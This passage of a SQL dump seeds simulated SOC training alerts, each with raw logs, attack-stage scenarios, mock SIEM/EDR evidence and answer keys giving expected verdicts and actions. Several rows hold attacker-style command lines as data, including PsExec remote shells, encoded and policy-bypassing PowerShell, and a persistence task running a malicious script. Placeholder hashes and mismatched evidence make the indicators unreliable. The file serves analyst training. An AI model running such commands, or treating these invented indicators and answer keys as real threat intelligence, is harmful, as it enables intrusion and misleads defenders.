(1319, 'Legitimate Remote Access Tool Misidentified as Malicious', 'low', 'Wazuh', 'A legitimate remote access tool was flagged as malicious due to its use of obfuscation techniques.', 'Malware', 'T1219', 0, 'New', NULL, '{\"timestamp\":\"2026-03-01T16:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"172.16.0.100\",\"username\":\"it_support\",\"hostname\":\"support-pc\",\"command_line\":\"remotesupport.exe /connect /obfuscate\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"remotesupport.exe /connect /obfuscate\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command line typical for internal IT operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution belongs to a known legitimate remote support tool, confirming the false positive.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1320, 'Detected Fast-Flux DNS Activity from Internal Server', 'medium', 'Splunk', 'An internal server was observed engaging in fast-flux DNS activity, commonly associated with botnet behavior.', 'DNS Anomaly', 'T1090', 0, 'New', NULL, '{\"timestamp\":\"2026-03-01T13:45:12Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.85\",\"username\":\"system\",\"hostname\":\"dns-server\",\"domain\":\"fluxdns.example.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of DNS server\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"fluxdns.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain used for legitimate testing purposes\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"dns_anomaly\",\"analysis_notes\":\"The activity was traced back to a legitimate testing process, confirming the false positive.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1321, 'Subtle Indicators of Lateral Movement Detected', 'high', 'CrowdStrike', 'Detected subtle indicators of lateral movement within the network using PSExec and WMI, likely part of a larger APT attack.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T07:29:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"192.168.1.41\",\"username\":\"svc_admin\",\"hostname\":\"server05\",\"command_line\":\"psexec \\\\\\\\192.168.1.41 -u svc_admin -p ******** cmd\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address initiating lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.41 -u svc_admin -p ******** cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and WMI in this context aligns with known lateral movement techniques, confirming the alert.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1322, 'Initial Access: Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'A phishing email has been detected targeting employees within key Israeli organizations. The email contains a malicious attachment designed to gain unauthorized access to the network.', 'Phishing', 'TA0001 - Initial Access', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T08:45:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"src_email\":\"attacker@m0s3sstaff.com\",\"dst_email\":\"employee@israeli-org.co.il\",\"subject\":\"Urgent Update Required\",\"attachment\":{\"filename\":\"update-instructions.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\",\"action\":\"Email delivered\",\"status\":\"Suspicious\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@m0s3sstaff.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email domain linked to Moses Staff APT\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Campaign Detected\",\"date\":\"2026-03-02T13:55:06.807Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1323, 'Execution: DCSrv Wiper Deployment', 'critical', 'Endpoint Detection Systems', 'Following successful initial access, the attackers deployed the DCSrv wiper malware on the targeted endpoint with the objective to destroy critical data and disrupt operations. This aligns with their politically-driven objectives to cause chaos within the target\'s infrastructure.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1029384756\",\"hostname\":\"target-server1\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"malware_name\":\"DCSrv Wiper\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\dcwiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"execution\",\"status\":\"success\",\"detection_method\":\"signature-based\",\"event_description\":\"Malware execution detected: DCSrv Wiper initiated on target-server1 by user admin_user from IP 203.0.113.45.\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in multiple cyber attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the DCSrv Wiper malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dcwiper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable file used by DCSrv Wiper.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1324, 'Data Exfiltration: Sensitive Data Leak', 'critical', 'Network Traffic Analysis', 'The final phase of the attack executed by the threat actor Moses Staff involved the exfiltration of sensitive data from Israeli organizations. The data is set to be used for public release and political leverage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:34:56Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":44322,\"dst_port\":443,\"filename\":\"Sensitive_Company_Data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"notes\":\"Large upload detected to known malicious IP.\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in previous data leaks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sensitive_Company_Data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of exfiltrated data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User account active and verified.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1325, 'Suspicious Dropbox API Activity Detected', 'medium', 'Network Traffic Analysis', 'IndigoZebra initiates their campaign by abusing the Dropbox API to establish a communication channel with compromised systems, bypassing traditional security measures.', 'Initial Access', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"src_ip\":\"192.168.1.15\",\"dest_ip\":\"96.45.183.149\",\"dest_domain\":\"api.dropboxapi.com\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"filename\":\"dbx_comm_payload.bin\",\"file_hash\":\"d2d2d2e5a5a5f5f5g5g5h5h5i5i5j5j5\",\"username\":\"indigo_user\",\"session_id\":\"6F2A1B3C4D5E6F7G8H9I0J1K2L3M4N5O\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"96.45.183.149\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"api.dropboxapi.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Public Domain Info\",\"verdict\":\"clean\",\"details\":\"Legitimate Dropbox API domain\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dbx_comm_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized payload file\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2e5a5a5f5f5g5g5h5h5i5i5j5j5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known IndigoZebra malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"indigo_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account suspected of being compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1326, 'xCaon Malware Execution on Host System', 'high', 'Endpoint Detection and Response (EDR)', 'The xCaon malware was executed on the host system, indicating the start of a potential system compromise. This step involves the execution of the malicious payload aimed at gaining control over the system.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"host_ip\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"executed_file\":\"C:\\\\Users\\\\Public\\\\xCaonPayload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john.doe\",\"process_id\":1234,\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File xCaonPayload.exe\",\"event_id\":4688,\"event_description\":\"A new process has been created.\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1327, 'Persistence Achieved via Scheduled Tasks', 'medium', 'System Logs', 'IndigoZebra ensures their presence by setting up scheduled tasks, allowing them to regain access even after system reboots. A scheduled task was created by the attacker to execute a malicious script periodically.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4698\",\"task_name\":\"\\\\IndigoZebra_MaintainAccess\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\Windows\\\\Temp\\\\malicious_script.bat\",\"user\":\"compromised_user\",\"user_sid\":\"S-1-5-21-123456789-1234567890-123456789-1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sha256_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account on the network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of known malicious file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c 